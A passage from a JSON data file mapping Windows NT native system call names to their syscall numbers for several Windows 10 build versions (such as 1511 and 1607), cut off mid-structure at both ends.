\"NtLockProductActivationKeys\": \"250\", \"NtLockRegistryKey\": \"251\", \"NtLockVirtualMemory\": \"252\", \"NtMakePermanentObject\": \"253\", \"NtMakeTemporaryObject\": \"254\", \"NtManagePartition\": \"255\", \"NtMapCMFModule\": \"256\", \"NtMapUserPhysicalPages\": \"257\", \"NtModifyBootEntry\": \"258\", \"NtModifyDriverEntry\": \"259\", \"NtNotifyChangeDirectoryFile\": \"260\", \"NtNotifyChangeKey\": \"261\", \"NtNotifyChangeMultipleKeys\": \"262\", \"NtNotifyChangeSession\": \"263\", \"NtOpenEnlistment\": \"264\", \"NtOpenEventPair\": \"265\", \"NtOpenIoCompletion\": \"266\", \"NtOpenJobObject\": \"267\", \"NtOpenKeyEx\": \"268\", \"NtOpenKeyTransacted\": \"269\", \"NtOpenKeyTransactedEx\": \"270\", \"NtOpenKeyedEvent\": \"271\", \"NtOpenMutant\": \"272\", \"NtOpenObjectAuditAlarm\": \"273\", \"NtOpenPartition\": \"274\", \"NtOpenPrivateNamespace\": \"275\", \"NtOpenProcessToken\": \"276\", \"NtOpenResourceManager\": \"277\", \"NtOpenSemaphore\": \"278\", \"NtOpenSession\": \"279\", \"NtOpenSymbolicLinkObject\": \"280\", \"NtOpenThread\": \"281\", \"NtOpenTimer\": \"282\", \"NtOpenTransaction\": \"283\", \"NtOpenTransactionManager\": \"284\", \"NtPlugPlayControl\": \"285\", \"NtPrePrepareComplete\": \"286\", \"NtPrePrepareEnlistment\": \"287\", \"NtPrepareComplete\": \"288\", \"NtPrepareEnlistment\": \"289\", \"NtPrivilegeCheck\": \"290\", \"NtPrivilegeObjectAuditAlarm\": \"291\", \"NtPrivilegedServiceAuditAlarm\": \"292\", \"NtPropagationComplete\": \"293\", \"NtPropagationFailed\": \"294\", \"NtPulseEvent\": \"295\", \"NtQueryBootEntryOrder\": \"296\", \"NtQueryBootOptions\": \"297\", \"NtQueryDebugFilterState\": \"298\", \"NtQueryDirectoryObject\": \"299\", \"NtQueryDriverEntryOrder\": \"300\", \"NtQueryEaFile\": \"301\", \"NtQueryFullAttributesFile\": \"302\", \"NtQueryInformationAtom\": \"303\", \"NtQueryInformationEnlistment\": \"304\", \"NtQueryInformationJobObject\": \"305\", \"NtQueryInformationPort\": \"306\", \"NtQueryInformationResourceManager\": \"307\", \"NtQueryInformationTransaction\": \"308\", \"NtQueryInformationTransactionManager\": \"309\", \"NtQueryInformationWorkerFactory\": \"310\", \"NtQueryInstallUILanguage\": \"311\", \"NtQueryIntervalProfile\": \"312\", \"NtQueryIoCompletion\": \"313\", \"NtQueryLicenseValue\": \"314\", \"NtQueryMultipleValueKey\": \"315\", \"NtQueryMutant\": \"316\", \"NtQueryOpenSubKeys\": \"317\", \"NtQueryOpenSubKeysEx\": \"318\", \"NtQueryPortInformationProcess\": \"319\", \"NtQueryQuotaInformationFile\": \"320\", \"NtQuerySecurityAttributesToken\": \"321\", \"NtQuerySecurityObject\": \"322\", \"NtQuerySemaphore\": \"323\", \"NtQuerySymbolicLinkObject\": \"324\", \"NtQuerySystemEnvironmentValue\": \"325\", \"NtQuerySystemEnvironmentValueEx\": \"326\", \"NtQuerySystemInformationEx\": \"327\", \"NtQueryTimerResolution\": \"328\", \"NtQueryWnfStateData\": \"329\", \"NtQueryWnfStateNameInformation\": \"330\", \"NtQueueApcThreadEx\": \"331\", \"NtRaiseException\": \"332\", \"NtRaiseHardError\": \"333\", \"NtReadOnlyEnlistment\": \"334\", \"NtRecoverEnlistment\": \"335\", \"NtRecoverResourceManager\": \"336\", \"NtRecoverTransactionManager\": \"337\", \"NtRegisterProtocolAddressInformation\": \"338\", \"NtRegisterThreadTerminatePort\": \"339\", \"NtReleaseKeyedEvent\": \"340\", \"NtReleaseWorkerFactoryWorker\": \"341\", \"NtRemoveIoCompletionEx\": \"342\", \"NtRemoveProcessDebug\": \"343\", \"NtRenameKey\": \"344\", \"NtRenameTransactionManager\": \"345\", \"NtReplaceKey\": \"346\", \"NtReplacePartitionUnit\": \"347\", \"NtReplyWaitReplyPort\": \"348\", \"NtRequestPort\": \"349\", \"NtResetEvent\": \"350\", \"NtResetWriteWatch\": \"351\", \"NtRestoreKey\": \"352\", \"NtResumeProcess\": \"353\", \"NtRevertContainerImpersonation\": \"354\", \"NtRollbackComplete\": \"355\", \"NtRollbackEnlistment\": \"356\", \"NtRollbackTransaction\": \"357\", \"NtRollforwardTransactionManager\": \"358\", \"NtSaveKey\": \"359\", \"NtSaveKeyEx\": \"360\", \"NtSaveMergedKeys\": \"361\", \"NtSecureConnectPort\": \"362\", \"NtSerializeBoot\": \"363\", \"NtSetBootEntryOrder\": \"364\", \"NtSetBootOptions\": \"365\", \"NtSetCachedSigningLevel\": \"366\", \"NtSetContextThread\": \"367\", \"NtSetDebugFilterState\": \"368\", \"NtSetDefaultHardErrorPort\": \"369\", \"NtSetDefaultLocale\": \"370\", \"NtSetDefaultUILanguage\": \"371\", \"NtSetDriverEntryOrder\": \"372\", \"NtSetEaFile\": \"373\", \"NtSetHighEventPair\": \"374\", \"NtSetHighWaitLowEventPair\": \"375\", \"NtSetIRTimer\": \"376\", \"NtSetInformationDebugObject\": \"377\", \"NtSetInformationEnlistment\": \"378\", \"NtSetInformationJobObject\": \"379\", \"NtSetInformationKey\": \"380\", \"NtSetInformationResourceManager\": \"381\", \"NtSetInformationSymbolicLink\": \"382\", \"NtSetInformationToken\": \"383\", \"NtSetInformationTransaction\": \"384\", \"NtSetInformationTransactionManager\": \"385\", \"NtSetInformationVirtualMemory\": \"386\", \"NtSetInformationWorkerFactory\": \"387\", \"NtSetIntervalProfile\": \"388\", \"NtSetIoCompletion\": \"389\", \"NtSetIoCompletionEx\": \"390\", \"NtSetLdtEntries\": \"391\", \"NtSetLowEventPair\": \"392\", \"NtSetLowWaitHighEventPair\": \"393\", \"NtSetQuotaInformationFile\": \"394\", \"NtSetSecurityObject\": \"395\", \"NtSetSystemEnvironmentValue\": \"396\", \"NtSetSystemEnvironmentValueEx\": \"397\", \"NtSetSystemInformation\": \"398\", \"NtSetSystemPowerState\": \"399\", \"NtSetSystemTime\": \"400\", \"NtSetThreadExecutionState\": \"401\", \"NtSetTimer2\": \"402\", \"NtSetTimerEx\": \"403\", \"NtSetTimerResolution\": \"404\", \"NtSetUuidSeed\": \"405\", \"NtSetVolumeInformationFile\": \"406\", \"NtSetWnfProcessNotificationEvent\": \"407\", \"NtShutdownSystem\": \"408\", \"NtShutdownWorkerFactory\": \"409\", \"NtSignalAndWaitForSingleObject\": \"410\", \"NtSinglePhaseReject\": \"411\", \"NtStartProfile\": \"412\", \"NtStopProfile\": \"413\", \"NtSubscribeWnfStateChange\": \"414\", \"NtSuspendProcess\": \"415\", \"NtSuspendThread\": \"416\", \"NtSystemDebugControl\": \"417\", \"NtTerminateJobObject\": \"418\", \"NtTestAlert\": \"419\", \"NtThawRegistry\": \"420\", \"NtThawTransactions\": \"421\", \"NtTraceControl\": \"422\", \"NtTranslateFilePath\": \"423\", \"NtUmsThreadYield\": \"424\", \"NtUnloadDriver\": \"425\", \"NtUnloadKey\": \"426\", \"NtUnloadKey2\": \"427\", \"NtUnloadKeyEx\": \"428\", \"NtUnlockFile\": \"429\", \"NtUnlockVirtualMemory\": \"430\", \"NtUnmapViewOfSectionEx\": \"431\", \"NtUnsubscribeWnfStateChange\": \"432\", \"NtUpdateWnfStateData\": \"433\", \"NtVdmControl\": \"434\", \"NtWaitForAlertByThreadId\": \"435\", \"NtWaitForDebugEvent\": \"436\", \"NtWaitForKeyedEvent\": \"437\", \"NtWaitForWorkViaWorkerFactory\": \"438\", \"NtWaitHighEventPair\": \"439\", \"NtWaitLowEventPair\": \"440\"}, \"1511\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAddAtomEx\": \"103\", \"NtAddBootEntry\": \"104\", \"NtAddDriverEntry\": \"105\", \"NtAdjustGroupsToken\": \"106\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"107\", \"NtAlertResumeThread\": \"108\", \"NtAlertThread\": \"109\", \"NtAlertThreadByThreadId\": \"110\", \"NtAllocateLocallyUniqueId\": \"111\", \"NtAllocateReserveObject\": \"112\", \"NtAllocateUserPhysicalPages\": \"113\", \"NtAllocateUuids\": \"114\", \"NtAlpcAcceptConnectPort\": \"115\", \"NtAlpcCancelMessage\": \"116\", \"NtAlpcConnectPort\": \"117\", \"NtAlpcConnectPortEx\": \"118\", \"NtAlpcCreatePort\": \"119\", \"NtAlpcCreatePortSection\": \"120\", \"NtAlpcCreateResourceReserve\": \"121\", \"NtAlpcCreateSectionView\": \"122\", \"NtAlpcCreateSecurityContext\": \"123\", \"NtAlpcDeletePortSection\": \"124\", \"NtAlpcDeleteResourceReserve\": \"125\", \"NtAlpcDeleteSectionView\": \"126\", \"NtAlpcDeleteSecurityContext\": \"127\", \"NtAlpcDisconnectPort\": \"128\", \"NtAlpcImpersonateClientContainerOfPort\": \"129\", \"NtAlpcImpersonateClientOfPort\": \"130\", \"NtAlpcOpenSenderProcess\": \"131\", \"NtAlpcOpenSenderThread\": \"132\", \"NtAlpcQueryInformation\": \"133\", \"NtAlpcQueryInformationMessage\": \"134\", \"NtAlpcRevokeSecurityContext\": \"135\", \"NtAlpcSendWaitReceivePort\": \"136\", \"NtAlpcSetInformation\": \"137\", \"NtAreMappedFilesTheSame\": \"138\", \"NtAssignProcessToJobObject\": \"139\", \"NtAssociateWaitCompletionPacket\": \"140\", \"NtCancelIoFileEx\": \"141\", \"NtCancelSynchronousIoFile\": \"142\", \"NtCancelTimer2\": \"143\", \"NtCancelWaitCompletionPacket\": \"144\", \"NtCommitComplete\": \"145\", \"NtCommitEnlistment\": \"146\", \"NtCommitTransaction\": \"147\", \"NtCompactKeys\": \"148\", \"NtCompareObjects\": \"149\", \"NtCompareTokens\": \"150\", \"NtCompleteConnectPort\": \"151\", \"NtCompressKey\": \"152\", \"NtConnectPort\": \"153\", \"NtCreateDebugObject\": \"154\", \"NtCreateDirectoryObject\": \"155\", \"NtCreateDirectoryObjectEx\": \"156\", \"NtCreateEnclave\": \"157\", \"NtCreateEnlistment\": \"158\", \"NtCreateEventPair\": \"159\", \"NtCreateIRTimer\": \"160\", \"NtCreateIoCompletion\": \"161\", \"NtCreateJobObject\": \"162\", \"NtCreateJobSet\": \"163\", \"NtCreateKeyTransacted\": \"164\", \"NtCreateKeyedEvent\": \"165\", \"NtCreateLowBoxToken\": \"166\", \"NtCreateMailslotFile\": \"167\", \"NtCreateMutant\": \"168\", \"NtCreateNamedPipeFile\": \"169\", \"NtCreatePagingFile\": \"170\", \"NtCreatePartition\": \"171\", \"NtCreatePort\": \"172\", \"NtCreatePrivateNamespace\": \"173\", \"NtCreateProcess\": \"174\", \"NtCreateProfile\": \"175\", \"NtCreateProfileEx\": \"176\", \"NtCreateResourceManager\": \"177\", \"NtCreateSemaphore\": \"178\", \"NtCreateSymbolicLinkObject\": \"179\", \"NtCreateThreadEx\": \"180\", \"NtCreateTimer\": \"181\", \"NtCreateTimer2\": \"182\", \"NtCreateToken\": \"183\", \"NtCreateTokenEx\": \"184\", \"NtCreateTransaction\": \"185\", \"NtCreateTransactionManager\": \"186\", \"NtCreateUserProcess\": \"187\", \"NtCreateWaitCompletionPacket\": \"188\", \"NtCreateWaitablePort\": \"189\", \"NtCreateWnfStateName\": \"190\", \"NtCreateWorkerFactory\": \"191\", \"NtDebugActiveProcess\": \"192\", \"NtDebugContinue\": \"193\", \"NtDeleteAtom\": \"194\", \"NtDeleteBootEntry\": \"195\", \"NtDeleteDriverEntry\": \"196\", \"NtDeleteFile\": \"197\", \"NtDeleteKey\": \"198\", \"NtDeleteObjectAuditAlarm\": \"199\", \"NtDeletePrivateNamespace\": \"200\", \"NtDeleteValueKey\": \"201\", \"NtDeleteWnfStateData\": \"202\", \"NtDeleteWnfStateName\": \"203\", \"NtDisableLastKnownGood\": \"204\", \"NtDisplayString\": \"205\", \"NtDrawText\": \"206\", \"NtEnableLastKnownGood\": \"207\", \"NtEnumerateBootEntries\": \"208\", \"NtEnumerateDriverEntries\": \"209\", \"NtEnumerateSystemEnvironmentValuesEx\": \"210\", \"NtEnumerateTransactionObject\": \"211\", \"NtExtendSection\": \"212\", \"NtFilterBootOption\": \"213\", \"NtFilterToken\": \"214\", \"NtFilterTokenEx\": \"215\", \"NtFlushBuffersFileEx\": \"216\", \"NtFlushInstallUILanguage\": \"217\", \"NtFlushInstructionCache\": \"218\", \"NtFlushKey\": \"219\", \"NtFlushProcessWriteBuffers\": \"220\", \"NtFlushVirtualMemory\": \"221\", \"NtFlushWriteBuffer\": \"222\", \"NtFreeUserPhysicalPages\": \"223\", \"NtFreezeRegistry\": \"224\", \"NtFreezeTransactions\": \"225\", \"NtGetCachedSigningLevel\": \"226\", \"NtGetCompleteWnfStateSubscription\": \"227\", \"NtGetContextThread\": \"228\", \"NtGetCurrentProcessorNumber\": \"229\", \"NtGetCurrentProcessorNumberEx\": \"230\", \"NtGetDevicePowerState\": \"231\", \"NtGetMUIRegistryInfo\": \"232\", \"NtGetNextProcess\": \"233\", \"NtGetNextThread\": \"234\", \"NtGetNlsSectionPtr\": \"235\", \"NtGetNotificationResourceManager\": \"236\", \"NtGetWriteWatch\": \"237\", \"NtImpersonateAnonymousToken\": \"238\", \"NtImpersonateThread\": \"239\", \"NtInitializeEnclave\": \"240\", \"NtInitializeNlsFiles\": \"241\", \"NtInitializeRegistry\": \"242\", \"NtInitiatePowerAction\": \"243\", \"NtIsSystemResumeAutomatic\": \"244\", \"NtIsUILanguageComitted\": \"245\", \"NtListenPort\": \"246\", \"NtLoadDriver\": \"247\", \"NtLoadEnclaveData\": \"248\", \"NtLoadKey\": \"249\", \"NtLoadKey2\": \"250\", \"NtLoadKeyEx\": \"251\", \"NtLockFile\": \"252\", \"NtLockProductActivationKeys\": \"253\", \"NtLockRegistryKey\": \"254\", \"NtLockVirtualMemory\": \"255\", \"NtMakePermanentObject\": \"256\", \"NtMakeTemporaryObject\": \"257\", \"NtManagePartition\": \"258\", \"NtMapCMFModule\": \"259\", \"NtMapUserPhysicalPages\": \"260\", \"NtModifyBootEntry\": \"261\", \"NtModifyDriverEntry\": \"262\", \"NtNotifyChangeDirectoryFile\": \"263\", \"NtNotifyChangeKey\": \"264\", \"NtNotifyChangeMultipleKeys\": \"265\", \"NtNotifyChangeSession\": \"266\", \"NtOpenEnlistment\": \"267\", \"NtOpenEventPair\": \"268\", \"NtOpenIoCompletion\": \"269\", \"NtOpenJobObject\": \"270\", \"NtOpenKeyEx\": \"271\", \"NtOpenKeyTransacted\": \"272\", \"NtOpenKeyTransactedEx\": \"273\", \"NtOpenKeyedEvent\": \"274\", \"NtOpenMutant\": \"275\", \"NtOpenObjectAuditAlarm\": \"276\", \"NtOpenPartition\": \"277\", \"NtOpenPrivateNamespace\": \"278\", \"NtOpenProcessToken\": \"279\", \"NtOpenResourceManager\": \"280\", \"NtOpenSemaphore\": \"281\", \"NtOpenSession\": \"282\", \"NtOpenSymbolicLinkObject\": \"283\", \"NtOpenThread\": \"284\", \"NtOpenTimer\": \"285\", \"NtOpenTransaction\": \"286\", \"NtOpenTransactionManager\": \"287\", \"NtPlugPlayControl\": \"288\", \"NtPrePrepareComplete\": \"289\", \"NtPrePrepareEnlistment\": \"290\", \"NtPrepareComplete\": \"291\", \"NtPrepareEnlistment\": \"292\", \"NtPrivilegeCheck\": \"293\", \"NtPrivilegeObjectAuditAlarm\": \"294\", \"NtPrivilegedServiceAuditAlarm\": \"295\", \"NtPropagationComplete\": \"296\", \"NtPropagationFailed\": \"297\", \"NtPulseEvent\": \"298\", \"NtQueryBootEntryOrder\": \"299\", \"NtQueryBootOptions\": \"300\", \"NtQueryDebugFilterState\": \"301\", \"NtQueryDirectoryObject\": \"302\", \"NtQueryDriverEntryOrder\": \"303\", \"NtQueryEaFile\": \"304\", \"NtQueryFullAttributesFile\": \"305\", \"NtQueryInformationAtom\": \"306\", \"NtQueryInformationEnlistment\": \"307\", \"NtQueryInformationJobObject\": \"308\", \"NtQueryInformationPort\": \"309\", \"NtQueryInformationResourceManager\": \"310\", \"NtQueryInformationTransaction\": \"311\", \"NtQueryInformationTransactionManager\": \"312\", \"NtQueryInformationWorkerFactory\": \"313\", \"NtQueryInstallUILanguage\": \"314\", \"NtQueryIntervalProfile\": \"315\", \"NtQueryIoCompletion\": \"316\", \"NtQueryLicenseValue\": \"317\", \"NtQueryMultipleValueKey\": \"318\", \"NtQueryMutant\": \"319\", \"NtQueryOpenSubKeys\": \"320\", \"NtQueryOpenSubKeysEx\": \"321\", \"NtQueryPortInformationProcess\": \"322\", \"NtQueryQuotaInformationFile\": \"323\", \"NtQuerySecurityAttributesToken\": \"324\", \"NtQuerySecurityObject\": \"325\", \"NtQuerySemaphore\": \"326\", \"NtQuerySymbolicLinkObject\": \"327\", \"NtQuerySystemEnvironmentValue\": \"328\", \"NtQuerySystemEnvironmentValueEx\": \"329\", \"NtQuerySystemInformationEx\": \"330\", \"NtQueryTimerResolution\": \"331\", \"NtQueryWnfStateData\": \"332\", \"NtQueryWnfStateNameInformation\": \"333\", \"NtQueueApcThreadEx\": \"334\", \"NtRaiseException\": \"335\", \"NtRaiseHardError\": \"336\", \"NtReadOnlyEnlistment\": \"337\", \"NtRecoverEnlistment\": \"338\", \"NtRecoverResourceManager\": \"339\", \"NtRecoverTransactionManager\": \"340\", \"NtRegisterProtocolAddressInformation\": \"341\", \"NtRegisterThreadTerminatePort\": \"342\", \"NtReleaseKeyedEvent\": \"343\", \"NtReleaseWorkerFactoryWorker\": \"344\", \"NtRemoveIoCompletionEx\": \"345\", \"NtRemoveProcessDebug\": \"346\", \"NtRenameKey\": \"347\", \"NtRenameTransactionManager\": \"348\", \"NtReplaceKey\": \"349\", \"NtReplacePartitionUnit\": \"350\", \"NtReplyWaitReplyPort\": \"351\", \"NtRequestPort\": \"352\", \"NtResetEvent\": \"353\", \"NtResetWriteWatch\": \"354\", \"NtRestoreKey\": \"355\", \"NtResumeProcess\": \"356\", \"NtRevertContainerImpersonation\": \"357\", \"NtRollbackComplete\": \"358\", \"NtRollbackEnlistment\": \"359\", \"NtRollbackTransaction\": \"360\", \"NtRollforwardTransactionManager\": \"361\", \"NtSaveKey\": \"362\", \"NtSaveKeyEx\": \"363\", \"NtSaveMergedKeys\": \"364\", \"NtSecureConnectPort\": \"365\", \"NtSerializeBoot\": \"366\", \"NtSetBootEntryOrder\": \"367\", \"NtSetBootOptions\": \"368\", \"NtSetCachedSigningLevel\": \"369\", \"NtSetContextThread\": \"370\", \"NtSetDebugFilterState\": \"371\", \"NtSetDefaultHardErrorPort\": \"372\", \"NtSetDefaultLocale\": \"373\", \"NtSetDefaultUILanguage\": \"374\", \"NtSetDriverEntryOrder\": \"375\", \"NtSetEaFile\": \"376\", \"NtSetHighEventPair\": \"377\", \"NtSetHighWaitLowEventPair\": \"378\", \"NtSetIRTimer\": \"379\", \"NtSetInformationDebugObject\": \"380\", \"NtSetInformationEnlistment\": \"381\", \"NtSetInformationJobObject\": \"382\", \"NtSetInformationKey\": \"383\", \"NtSetInformationResourceManager\": \"384\", \"NtSetInformationSymbolicLink\": \"385\", \"NtSetInformationToken\": \"386\", \"NtSetInformationTransaction\": \"387\", \"NtSetInformationTransactionManager\": \"388\", \"NtSetInformationVirtualMemory\": \"389\", \"NtSetInformationWorkerFactory\": \"390\", \"NtSetIntervalProfile\": \"391\", \"NtSetIoCompletion\": \"392\", \"NtSetIoCompletionEx\": \"393\", \"NtSetLdtEntries\": \"394\", \"NtSetLowEventPair\": \"395\", \"NtSetLowWaitHighEventPair\": \"396\", \"NtSetQuotaInformationFile\": \"397\", \"NtSetSecurityObject\": \"398\", \"NtSetSystemEnvironmentValue\": \"399\", \"NtSetSystemEnvironmentValueEx\": \"400\", \"NtSetSystemInformation\": \"401\", \"NtSetSystemPowerState\": \"402\", \"NtSetSystemTime\": \"403\", \"NtSetThreadExecutionState\": \"404\", \"NtSetTimer2\": \"405\", \"NtSetTimerEx\": \"406\", \"NtSetTimerResolution\": \"407\", \"NtSetUuidSeed\": \"408\", \"NtSetVolumeInformationFile\": \"409\", \"NtSetWnfProcessNotificationEvent\": \"410\", \"NtShutdownSystem\": \"411\", \"NtShutdownWorkerFactory\": \"412\", \"NtSignalAndWaitForSingleObject\": \"413\", \"NtSinglePhaseReject\": \"414\", \"NtStartProfile\": \"415\", \"NtStopProfile\": \"416\", \"NtSubscribeWnfStateChange\": \"417\", \"NtSuspendProcess\": \"418\", \"NtSuspendThread\": \"419\", \"NtSystemDebugControl\": \"420\", \"NtTerminateJobObject\": \"421\", \"NtTestAlert\": \"422\", \"NtThawRegistry\": \"423\", \"NtThawTransactions\": \"424\", \"NtTraceControl\": \"425\", \"NtTranslateFilePath\": \"426\", \"NtUmsThreadYield\": \"427\", \"NtUnloadDriver\": \"428\", \"NtUnloadKey\": \"429\", \"NtUnloadKey2\": \"430\", \"NtUnloadKeyEx\": \"431\", \"NtUnlockFile\": \"432\", \"NtUnlockVirtualMemory\": \"433\", \"NtUnmapViewOfSectionEx\": \"434\", \"NtUnsubscribeWnfStateChange\": \"435\", \"NtUpdateWnfStateData\": \"436\", \"NtVdmControl\": \"437\", \"NtWaitForAlertByThreadId\": \"438\", \"NtWaitForDebugEvent\": \"439\", \"NtWaitForKeyedEvent\": \"440\", \"NtWaitForWorkViaWorkerFactory\": \"441\", \"NtWaitHighEventPair\": \"442\", \"NtWaitLowEventPair\": \"443\"}, \"1607\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAddAtomEx\": \"103\", \"NtAddBootEntry\": \"104\", \"NtAddDriverEntry\": \"105\", \"NtAdjustGroupsToken\": \"106\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"107\", \"NtAlertResumeThread\": \"108\", \"NtAlertThread\": \"109\", \"NtAlertThreadByThreadId\": \"110\", 